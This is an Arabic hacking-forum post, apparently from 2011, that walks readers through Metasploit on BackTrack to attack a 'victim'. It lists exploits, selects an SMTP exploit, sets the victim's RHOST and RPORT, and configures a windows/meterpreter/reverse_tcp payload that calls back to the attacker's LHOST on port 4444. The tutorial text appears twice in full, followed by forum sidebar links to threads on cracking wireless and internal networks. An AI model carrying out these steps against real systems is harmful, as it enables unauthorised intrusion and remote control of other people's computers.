لسلآم عليكم و رحمـة الله و بركـآتة
آخبآركم آن شـآء الله بخيـر
اليـوم بشرح لكم طريقة استغلال الثغرات ، انا متأكد ان الكثير يسمع بالثغرات ولا يعرف استغلالها ، و انا بحاول على قد ما اقدر اني اغير روتين القسم من برنامج تشفير و و سيرفر مشفر و شرح تشفير و نسخة بيفروست و مدري ايش آلى الافضل ، و ان شاء الله الكل يتساعد معي
طيـب ندخل بالشـرح
الكل يسمع بالثغرات Exploits ولا يعرف كيف يستغلهـآ ، طبعاً لها شروحات بدورة سيلفر روت بس ماحد يمها الدوره و الكل يحسب ان الدوره تلحس المخ و من هالكلام و لو تتابع الدرس اكثر من مره راح تفهمهـ زيـن
لكن مشكلتنا حنا كسالا ما نحب نقراء و نبي السريع بس , نرجع لموضوعنا .
الشرح بيكون على الباك تراك و تقدرون تنفذون بعض من الشرح من الوندوز عن طريق الميتا سبلويت ويب او الصفحه الي تفتح لك حق الميتا بس فاشله اكيد فحول نظامك الى ليونكس
بنشرح طريقة استعراض الثغرات و تغيير المتغيرات تبع الثغره طيب ممكن البعض يقول وش يعني المتغيرات ؟
المتغيرات هي مثلاً يبي الاي بي تبعك انت LHOST و البورت LPORT تحطهم بالثغره طيب كيف تعرف اذا هو طلب الاي بي و البورت تبعك ؟
اول شي نروح نستعرض الثغرات من الميتا سبلويت
ندخل على الميتا بالامر
كود PHP:
cd /pentest/exploits/framework3
بعد نكتب الامر هذا
كود PHP:
./msfconsole
راح يشتغل معنا الميتا
طيب الحين نستعرض الثغرات بالامر
كود PHP:
show exploits
راح تطلع لنا ثغرات كثيره
طيب مثلاً نبي الثغره هذي
كود:
3-046 Exchange 2000 XEXCH50 Heap Overflow
نشوف مسارها تحتها
كود:
windows/smtp/wmailserve
طيب عشان نشغلها نكتب الامر هذا
كود PHP:
use exploit//مسار الثغره
يعني زي كذا
كود PHP:
use exploit/windows/smtp/wmailserver
طيب الحين دخلنا الثغره نكتب الامر
كود PHP:
info
عشان نعرف متغيرات الثغره وش مطلوب
و طلع لنا RHOST و RPORT و لاحظ اذا شفت مثلاً حرف R قبل البورت او الهوست معناه للضحيه مو لك انت و طبعاً بيجي جنب البورت و الهوست لوكال ان كان لوكال فأن الثغره بتشتغل على الشبكه الداخليه بس و تكتب اي بي الضحيه الي متصل بالشبكه تجي بدايته 192.
الحيـن باقي نضيف المتغيرات للثغره بالطريقة التاليه :
مثل ما شفنا الثغره طالبه RHOST and RPORT نغيرهم بالامر
كود PHP:
set RHOST اي بي الضحيه
كود PHP:
set RPORT بورت الضحيه
و البورت هو يجي مع الثغره عادي بس احياناً بعض الثغراات تغير البورت تبعها و تشتغل
طيب بعد ما غيرنا المتغيرات نجرب نكتب الامر
كود PHP:
info
و نشوف ان المتغيرات تغيرت بالي اضفناها
-----
بعد كذا ننتقل للبايلود الي نبيه و انا انصح بـ meterpreter لانه الافضل و انا قلت الافضل مو لخبرتي فيها بس كل محترفي الهكر يفضلون البايلود هذا
طيب نفتح ترنمال جديد و ندخل الميتا و نكتب الامر
كود PHP:
./msfconsole
بعدين نروح للبايلود الي نبيه بالامر
كود PHP:
use payload/windows/meterpreter/reverse_tcp
و الي يبي بايلود غير هذا عادي يبحث عن الي يبي بالامر
كود PHP:
show payloads
طيب الحين بعد البايلود له متغيرات نكتب الامر
كود PHP:
info
عشان نعرف المتغيرات وش الي مطلوبه
نشوف انه طلب LHOST و LPORT يعني الاي بي تبع المخترق و البورت
طيب نكتبهم بالامر
كود PHP:
set LHOST اي بي المهاجم
كود PHP:
set LPORT بورت المهاجم و يفضل تتركه 4444
اوكي بعد كذا اطلع من البايلود و روح ارجع للثغره
و اكتب استدعاء للبايلود الي نبي نستخدمه بالامر
كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp
كلمة payload اكتبها بالكبتل كذا PAYLOAD
بعدين اكتب
كود PHP:
exploit
ان طلع لك
كود:
[-] Exploit failed: The following options failed to validate: RHOST.[*] Exploit completed, but no session was created.
معناه الثغره ما تشتغل على الضحيهـ جرب غيرها
و بالشرح الفيديو طلع نفس هالشي لان الثغره مرقعه على الجهاز او البرنامج مو موجود او البورت او او او ترجم الخطأ و تعرف
----------------------------------------------------------------------------
و سويت لكم شرح فيديو عشان البعض كسول ما يقراء الموضوع كامل يطمر كم سطر
لتحميل الشرح اضغط على اسمي
ArHabY-HacKeR
آخبآركم آن شـآء الله بخيـر
اليـوم بشرح لكم طريقة استغلال الثغرات ، انا متأكد ان الكثير يسمع بالثغرات ولا يعرف استغلالها ، و انا بحاول على قد ما اقدر اني اغير روتين القسم من برنامج تشفير و و سيرفر مشفر و شرح تشفير و نسخة بيفروست و مدري ايش آلى الافضل ، و ان شاء الله الكل يتساعد معي
طيـب ندخل بالشـرح
الكل يسمع بالثغرات Exploits ولا يعرف كيف يستغلهـآ ، طبعاً لها شروحات بدورة سيلفر روت بس ماحد يمها الدوره و الكل يحسب ان الدوره تلحس المخ و من هالكلام و لو تتابع الدرس اكثر من مره راح تفهمهـ زيـن
لكن مشكلتنا حنا كسالا ما نحب نقراء و نبي السريع بس , نرجع لموضوعنا .
الشرح بيكون على الباك تراك و تقدرون تنفذون بعض من الشرح من الوندوز عن طريق الميتا سبلويت ويب او الصفحه الي تفتح لك حق الميتا بس فاشله اكيد فحول نظامك الى ليونكس
بنشرح طريقة استعراض الثغرات و تغيير المتغيرات تبع الثغره طيب ممكن البعض يقول وش يعني المتغيرات ؟
المتغيرات هي مثلاً يبي الاي بي تبعك انت LHOST و البورت LPORT تحطهم بالثغره طيب كيف تعرف اذا هو طلب الاي بي و البورت تبعك ؟
اول شي نروح نستعرض الثغرات من الميتا سبلويت
ندخل على الميتا بالامر
كود PHP:
cd /pentest/exploits/framework3
بعد نكتب الامر هذا
كود PHP:
./msfconsole
راح يشتغل معنا الميتا
طيب الحين نستعرض الثغرات بالامر
كود PHP:
show exploits
راح تطلع لنا ثغرات كثيره
طيب مثلاً نبي الثغره هذي
كود:
3-046 Exchange 2000 XEXCH50 Heap Overflow
نشوف مسارها تحتها
كود:
windows/smtp/wmailserve
طيب عشان نشغلها نكتب الامر هذا
كود PHP:
use exploit//مسار الثغره
يعني زي كذا
كود PHP:
use exploit/windows/smtp/wmailserver
طيب الحين دخلنا الثغره نكتب الامر
كود PHP:
info
عشان نعرف متغيرات الثغره وش مطلوب
و طلع لنا RHOST و RPORT و لاحظ اذا شفت مثلاً حرف R قبل البورت او الهوست معناه للضحيه مو لك انت و طبعاً بيجي جنب البورت و الهوست لوكال ان كان لوكال فأن الثغره بتشتغل على الشبكه الداخليه بس و تكتب اي بي الضحيه الي متصل بالشبكه تجي بدايته 192.
الحيـن باقي نضيف المتغيرات للثغره بالطريقة التاليه :
مثل ما شفنا الثغره طالبه RHOST and RPORT نغيرهم بالامر
كود PHP:
set RHOST اي بي الضحيه
كود PHP:
set RPORT بورت الضحيه
و البورت هو يجي مع الثغره عادي بس احياناً بعض الثغراات تغير البورت تبعها و تشتغل
طيب بعد ما غيرنا المتغيرات نجرب نكتب الامر
كود PHP:
info
و نشوف ان المتغيرات تغيرت بالي اضفناها
-----
بعد كذا ننتقل للبايلود الي نبيه و انا انصح بـ meterpreter لانه الافضل و انا قلت الافضل مو لخبرتي فيها بس كل محترفي الهكر يفضلون البايلود هذا
طيب نفتح ترنمال جديد و ندخل الميتا و نكتب الامر
كود PHP:
./msfconsole
بعدين نروح للبايلود الي نبيه بالامر
كود PHP:
use payload/windows/meterpreter/reverse_tcp
و الي يبي بايلود غير هذا عادي يبحث عن الي يبي بالامر
كود PHP:
show payloads
طيب الحين بعد البايلود له متغيرات نكتب الامر
كود PHP:
info
عشان نعرف المتغيرات وش الي مطلوبه
نشوف انه طلب LHOST و LPORT يعني الاي بي تبع المخترق و البورت
طيب نكتبهم بالامر
كود PHP:
set LHOST اي بي المهاجم
كود PHP:
set LPORT بورت المهاجم و يفضل تتركه 4444
اوكي بعد كذا اطلع من البايلود و روح ارجع للثغره
و اكتب استدعاء للبايلود الي نبي نستخدمه بالامر
كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp
كلمة payload اكتبها بالكبتل كذا PAYLOAD
بعدين اكتب
كود PHP:
exploit
ان طلع لك
كود:
[-] Exploit failed: The following options failed to validate: RHOST.[*] Exploit completed, but no session was created.
معناه الثغره ما تشتغل على الضحيهـ جرب غيرها
و بالشرح الفيديو طلع نفس هالشي لان الثغره مرقعه على الجهاز او البرنامج مو موجود او البورت او او او ترجم الخطأ و تعرف
----------------------------------------------------------------------------
و سويت لكم شرح فيديو عشان البعض كسول ما يقراء الموضوع كامل يطمر كم سطر
لتحميل الشرح اضغط على اسمي
ArHabY-HacKeR
الجمعة سبتمبر 16, 2011 12:05 am من طرف y2ss
» اسهل كتاب لتعليم الفيجوال بيسك 6 للمبتدئين
الخميس سبتمبر 01, 2011 4:28 pm من طرف hassan
» درس عمل متصفح Internet Explorer
الخميس سبتمبر 01, 2011 4:23 pm من طرف hassan
» دروة تعلم الفيجول بيسك من الصفر للاحتراف عربيه صوت وصوره
الخميس سبتمبر 01, 2011 4:20 pm من طرف hassan
» معلومات عن لغات البرمجة
الخميس سبتمبر 01, 2011 4:16 pm من طرف Admin
» التـعرف على ادوات عرض الملفات بشكل اوسع ...تطبيق مثال ..!
الخميس سبتمبر 01, 2011 4:15 pm من طرف Admin
» برنامج Visual Basic 2008 بحجم لا يتعدى 3 ميجا
الخميس سبتمبر 01, 2011 4:10 pm من طرف Admin
» اختراق الشبكات اللاسلكيه والحصول على اشتراكات مجانيه طريقه مجربه ومضمونه 90%
الأربعاء أغسطس 31, 2011 7:31 pm من طرف refland
» كيفية اختراق الشبكات الداخلية
السبت يونيو 25, 2011 12:22 am من طرف lhabib